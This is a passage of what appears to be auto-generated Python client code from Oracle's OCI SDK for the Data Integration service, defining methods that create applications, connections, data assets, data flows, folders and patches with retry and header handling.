if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_compartment_details)
def create_application(self, workspace_id, create_application_details, **kwargs):
"""
Creates an application.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateApplicationDetails create_application_details: (required)
The details needed to create an application.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Application`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_application.py.html>`__ to see an example of how to use create_application API.
"""
resource_path = "/workspaces/{workspaceId}/applications"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_application got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_application_details,
response_type="Application")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_application_details,
response_type="Application")
def create_connection(self, workspace_id, create_connection_details, **kwargs):
"""
Creates a connection under an existing data asset.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateConnectionDetails create_connection_details: (required)
The information needed to create a connection.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Connection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_connection.py.html>`__ to see an example of how to use create_connection API.
"""
resource_path = "/workspaces/{workspaceId}/connections"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_connection got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_connection_details,
response_type="Connection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_connection_details,
response_type="Connection")
def create_connection_validation(self, workspace_id, create_connection_validation_details, **kwargs):
"""
Creates a connection validation.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateConnectionValidationDetails create_connection_validation_details: (required)
The information needed to validate a connection.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ConnectionValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_connection_validation.py.html>`__ to see an example of how to use create_connection_validation API.
"""
resource_path = "/workspaces/{workspaceId}/connectionValidations"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_connection_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_connection_validation_details,
response_type="ConnectionValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_connection_validation_details,
response_type="ConnectionValidation")
def create_data_asset(self, workspace_id, create_data_asset_details, **kwargs):
"""
Creates a data asset with default connection.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateDataAssetDetails create_data_asset_details: (required)
The information needed to create a data asset.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataAsset`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_data_asset.py.html>`__ to see an example of how to use create_data_asset API.
"""
resource_path = "/workspaces/{workspaceId}/dataAssets"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_data_asset_details,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_data_asset_details,
response_type="DataAsset")
def create_data_flow(self, workspace_id, create_data_flow_details, **kwargs):
"""
Creates a new data flow in a project or folder ready for performing data integrations.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateDataFlowDetails create_data_flow_details: (required)
The details needed to create a new data flow.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataFlow`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_data_flow.py.html>`__ to see an example of how to use create_data_flow API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlows"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_data_flow got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_data_flow_details,
response_type="DataFlow")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_data_flow_details,
response_type="DataFlow")
def create_data_flow_validation(self, workspace_id, create_data_flow_validation_details, **kwargs):
"""
Accepts the data flow definition in the request payload and creates a data flow validation.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateDataFlowValidationDetails create_data_flow_validation_details: (required)
The information needed to create the data flow validation for the data flow object.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataFlowValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_data_flow_validation.py.html>`__ to see an example of how to use create_data_flow_validation API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlowValidations"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_data_flow_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_data_flow_validation_details,
response_type="DataFlowValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_data_flow_validation_details,
response_type="DataFlowValidation")
def create_entity_shape(self, workspace_id, connection_key, schema_resource_name, create_entity_shape_details, **kwargs):
"""
Creates the data entity shape using the shape from the data asset.
:param str workspace_id: (required)
The workspace ID.
:param str connection_key: (required)
The connection key.
:param str schema_resource_name: (required)
The schema resource name used for retrieving schemas.
:param oci.data_integration.models.CreateEntityShapeDetails create_entity_shape_details: (required)
The details needed to create the data entity shape.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.EntityShape`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_entity_shape.py.html>`__ to see an example of how to use create_entity_shape API.
"""
resource_path = "/workspaces/{workspaceId}/connections/{connectionKey}/schemas/{schemaResourceName}/entityShapes"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_entity_shape got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionKey": connection_key,
"schemaResourceName": schema_resource_name
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_entity_shape_details,
response_type="EntityShape")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_entity_shape_details,
response_type="EntityShape")
def create_external_publication(self, workspace_id, task_key, create_external_publication_details, **kwargs):
"""
Publish a DataFlow in a OCI DataFlow application.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param oci.data_integration.models.CreateExternalPublicationDetails create_external_publication_details: (required)
Details needed to publish a task to OCI DataFlow application.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ExternalPublication`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_external_publication.py.html>`__ to see an example of how to use create_external_publication API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublications"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_external_publication got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_external_publication_details,
response_type="ExternalPublication")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_external_publication_details,
response_type="ExternalPublication")
def create_external_publication_validation(self, workspace_id, task_key, create_external_publication_validation_details, **kwargs):
"""
Validates a specific task.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param oci.data_integration.models.CreateExternalPublicationValidationDetails create_external_publication_validation_details: (required)
The information needed to create a task validation.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ExternalPublicationValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_external_publication_validation.py.html>`__ to see an example of how to use create_external_publication_validation API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublicationValidations"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_external_publication_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_external_publication_validation_details,
response_type="ExternalPublicationValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_external_publication_validation_details,
response_type="ExternalPublicationValidation")
def create_folder(self, workspace_id, create_folder_details, **kwargs):
"""
Creates a folder in a project or in another folder, limited to two levels of folders. |
Folders are used to organize your design-time resources, such as tasks or data flows.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateFolderDetails create_folder_details: (required)
The details needed to create a folder.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Folder`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_folder.py.html>`__ to see an example of how to use create_folder API.
"""
resource_path = "/workspaces/{workspaceId}/folders"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_folder got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_folder_details,
response_type="Folder")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_folder_details,
response_type="Folder")
def create_patch(self, workspace_id, application_key, create_patch_details, **kwargs):
"""
Creates a patch in an application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param oci.data_integration.models.CreatePatchDetails create_patch_details: (required)
Detailed needed to create a patch in an application.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Patch`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_patch.py.html>`__ to see an example of how to use create_patch API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/patches"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_patch got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
